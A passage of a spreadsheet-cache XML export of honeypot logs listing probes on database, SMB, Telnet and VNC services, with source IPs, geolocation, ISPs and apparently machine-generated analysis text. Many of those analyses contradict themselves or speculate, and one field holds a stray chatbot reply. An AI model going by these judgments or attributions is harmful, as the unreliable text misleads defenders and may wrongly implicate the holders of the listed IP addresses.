    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7ab0:24db"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: An attempt to exploit Microsoft SQL Server vulnerability, indicating potential unauthorized database access or injection._x000a__x000a_This indicates that an attacker is trying to gain control over the database by exploiting its vulnerabilities._x000a__x000a_It may be a precursor to further malicious activities such as data theft. &amp;&amp; There is insufficient log data to analyze for possible malicious activity. &amp;&amp; No log data provided, therefore I have nothing to analyze or describe."/>
    <m/>
  </r>
  <r>
    <x v="553"/>
    <x v="553"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:05:33"/>
    <d v="2025-03-11T16:43:09"/>
    <d v="2025-04-28T18:05:33"/>
    <n v="632"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H3"/>
    <s v="5900&amp;&amp;61483&amp;&amp;55965&amp;&amp;58904&amp;&amp;59102&amp;&amp;49646"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="State of Berlin"/>
    <s v="Kreisfreie Stadt Berlin"/>
    <s v="Berlin"/>
    <s v="2950159"/>
    <s v="10178"/>
    <s v="52.52"/>
    <s v="13.405"/>
    <s v="8560"/>
    <s v="IONOS SE"/>
    <s v="IONOS SE"/>
    <s v="hosting"/>
    <s v="De Ber Ionos Cloud Txl"/>
    <s v="2001-02-19"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d99a:5176"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="No VNC activity detected, likely indicating that an attacker did not attempt to access or exploit this service, possibly because it was not being used by the honeypot's target audience. _x000a_This lack of activity might imply that other services are being targeted instead._x000a_It could also mean that the system is not visible or accessible for some reason. &amp;&amp; Possible attempted VNC connection from an unknown source with no credentials provided. _x000a_No authentication occurred which could be indicative of brute-force scanning or unauthorized access attempts. _x000a_This may be an automated probe to identify potential vulnerabilities."/>
    <s v="VNC Attack &amp;&amp; Port scan"/>
  </r>
  <r>
    <x v="554"/>
    <x v="554"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:01:27"/>
    <d v="2025-04-28T18:01:27"/>
    <d v="2025-04-28T18:01:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AF"/>
    <s v="Afghanistan"/>
    <s v="HER"/>
    <s v="Herat"/>
    <s v="Herat District"/>
    <s v="Herat"/>
    <s v="1140026"/>
    <s v="NA"/>
    <s v="34.3482"/>
    <s v="62.1997"/>
    <s v="55424"/>
    <s v="INSTATELECOM-AS-AP"/>
    <s v="DSL Broadband Network Herat"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af6a:26d1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown or failed attempt to connect to TELNET service, indicating potential probing or scanning activity for vulnerabilities in this service type. No malicious action was detected, as the connection attempt failed. This suggests that the system was not compromised but may have been targeted by an attacker. &amp;&amp; The data indicates a potential malicious activity where an attempt was made to establish a TELNET connection but no data was received, suggesting a failed or blocked attack. This may be a reconnaissance probe by an attacker. The lack of any transmitted data suggests the attempt was likely aborted quickly."/>
    <s v="BruteForce Attempt &amp;&amp; Telnet Scanning"/>
  </r>
  <r>
    <x v="555"/>
    <x v="555"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T17:20:52"/>
    <d v="2024-07-06T22:00:00"/>
    <d v="2025-04-28T17:20:52"/>
    <n v="3648"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="10"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="418863"/>
    <s v="NA"/>
    <s v="32.6539"/>
    <s v="51.666"/>
    <s v="204834"/>
    <s v="Shabakieh Isfahan Co PJSC"/>
    <s v="Shabakieh Isfahan Co PJSC"/>
    <s v="business"/>
    <s v="Shabakiehesfahan"/>
    <s v="2017-12-18"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,53058)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,53697)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,63064)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,64035)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,61367)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9ed:5451"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unauthorized user has been granted basic authentication access to local resources, potentially using SMB service. This indicates potential unauthorized access to sensitive files or systems. User attempted to authenticate locally as administrator. &amp;&amp; A user has authenticated to the system using basic authentication, which could be an attempt to gain unauthorized access or brute force login attempts. The use of basic authentication may indicate a lack of proper security measures or weak password policies. This could be a sign of malicious activity such as phishing or account compromise. &amp;&amp; This suggests an attempt to exploit MySQL database vulnerabilities, potentially for unauthorized access or data theft. The attacker may be probing weaknesses or attempting to gain a foothold in the system. This could be a reconnaissance phase before more malicious activities are carried out."/>
    <s v="SMB Login &amp;&amp; SMB Login"/>
  </r>
  <r>
    <x v="556"/>
    <x v="556"/>
    <s v="static-198-54-134-154.cust.tzulo.com"/>
    <x v="0"/>
    <d v="2025-04-28T17:19:39"/>
    <d v="2025-04-28T17:19:39"/>
    <d v="2025-04-28T17:19:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="ID"/>
    <s v="Idaho"/>
    <s v="Ada"/>
    <s v="Meridian"/>
    <s v="5600685"/>
    <s v="83680"/>
    <s v="43.6121"/>
    <s v="-116.392"/>
    <s v="11878"/>
    <s v="TZULO"/>
    <s v="tzulo, inc."/>
    <s v="hosting"/>
    <s v="Tzulo-Sjc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-04-19 04:30:40"/>
    <s v="2026-04-19 04:30:40"/>
    <s v="2025-03-21 06:21:29"/>
    <s v="['NS1.TZULO.COM', 'NS2.TZULO.COM']"/>
    <s v="ENOM, INC."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Whois Agent (081135083)"/>
    <x v="10"/>
    <s v="NA"/>
    <s v="['PO Box 639', 'C/O tzulo.com']"/>
    <s v="::ffff:c636:869a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No MySQL related activity detected, possibly an attempt to connect or probe for vulnerability but was unsuccessful or blocked. No malicious action taken, but potential threat noted. System is still secure at this time. &amp;&amp; No malicious activity detected as the service is not responding (MySQL server appears to be down). _x000a_This could indicate a denial of service attack or a database outage. _x000a_The lack of response suggests that an attacker may be trying to flood the system with requests."/>
    <m/>
  </r>
  <r>
    <x v="557"/>
    <x v="557"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:32:00"/>
    <d v="2023-11-24T16:29:25"/>
    <d v="2025-04-28T16:32:00"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23048&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="residential"/>
    <s v="BHARTI"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:912e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="558"/>
    <x v="558"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:29:09"/>
    <d v="2025-04-28T16:29:09"/>
    <d v="2025-04-28T16:29:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:17f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="559"/>
    <x v="559"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:26:04"/>
    <d v="2025-02-07T12:41:08"/>
    <d v="2025-04-28T16:26:04"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Saharanpur"/>
    <s v="Chhutmalpur"/>
    <s v="1441210"/>
    <s v="NA"/>
    <s v="30.0321"/>
    <s v="77.7533"/>
    <s v="133278"/>
    <s v="Dehradun Enet Solutions Private Ltd"/>
    <s v="Dehradun Enet Solutions Private Ltd"/>
    <s v="business"/>
    <s v="Dehradun Enet Solutions Private Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.123.249.132,62950)}&amp;&amp;{Data_SMB:Incoming connection (27.123.249.132,64239)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b7b:f984"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="560"/>
    <x v="560"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:25:46"/>
    <d v="2023-09-30T00:32:26"/>
    <d v="2025-04-28T16:25:46"/>
    <n v="3559"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="22599&amp;&amp;123&amp;&amp;57480&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (MIDC Industrial Area)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.0652"/>
    <s v="73.0289"/>
    <s v="17762"/>
    <s v="Tata Teleservices (Maharashtra) Ltd"/>
    <s v="TTML"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50037)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50586)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50617)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,51138)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,64456)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,64490)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,49340)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,63749)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,63806)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,65126)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,49885)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50655)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:728f:87a2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A suspicious incoming SMB connection from an unknown IP address (114.143.135.162) at port 49885 indicating potential malware or brute-force attack attempts on shared resources. The IP origin is likely malicious due to the unusual port number and lack of authentication. Further investigation is required for security measures. &amp;&amp; An incoming connection was detected from an IP address, indicating potential unauthorized access to the SMB service. This could be an attempt to exploit vulnerabilities or gain unauthorized access. The source IP is likely spoofed, making it difficult to track its origin. &amp;&amp; This suggests an attempt to access or exploit Microsoft SQL Server database, potentially for unauthorized data extraction or malicious activities. The fact that it's being queried is unusual and may indicate a vulnerability being targeted. An attacker might be trying to gather sensitive information from the database."/>
    <s v="SMB Scanning &amp;&amp; SMB Scan"/>
  </r>
  <r>
    <x v="561"/>
    <x v="561"/>
    <s v="c-69-137-31-194.hsd1.al.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:10:43"/>
    <d v="2025-02-08T05:36:16"/>
    <d v="2025-04-28T16:10:43"/>
    <n v="147"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AL"/>
    <s v="Alabama"/>
    <s v="Madison"/>
    <s v="Huntsville"/>
    <s v="4068590"/>
    <s v="35893"/>
    <s v="34.7304"/>
    <s v="-86.5861"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4589:1fc2"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided. &amp;&amp; No activity data provided, unable to analyze."/>
    <s v="I'd love to help, but it seems like you haven't provided any log data. Can you please provide the log data so I can analyze and name the type of attack?"/>
  </r>
  <r>
    <x v="562"/>
    <x v="562"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T16:01:28"/>
    <d v="2025-04-28T16:01:28"/>
    <d v="2025-04-28T16:01:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="71"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:1e49"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET traffic was detected, but this is unusual since TELNET access is typically restricted. This could indicate an attempt to bypass security measures or exploit a vulnerability. It might also suggest a lack of malicious activity in this area. &amp;&amp; No TELNET activity detected, indicating no malicious login attempts via this service so far."/>
    <s v="Port Scan &amp;&amp; Telnet Attack"/>
  </r>
  <r>
    <x v="563"/>
    <x v="563"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:49:34"/>
    <d v="2024-01-12T03:15:00"/>
    <d v="2025-04-28T15:49:34"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="143&amp;&amp;27064&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;50095"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="business"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="2008-07-07"/>
    <s v="BNLD-209392-NewDelhi"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,56755)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,56747)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,57029)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,59582)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,59825)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,62026)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,62370)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,57719)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7abb:27b2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates an attempt to exploit Microsoft SQL Server, possibly through a brute-force attack or vulnerability scanning. The attacker may be trying to gain unauthorized access to sensitive data or execute malicious queries. This could be an early stage of a larger cyber attack."/>
    <m/>
  </r>
  <r>
    <x v="564"/>
    <x v="564"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:34:23"/>
    <d v="2025-04-28T15:34:23"/>
    <d v="2025-04-28T15:34:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:76c5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="565"/>
    <x v="565"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:29:21"/>
    <d v="2025-04-28T15:28:35"/>
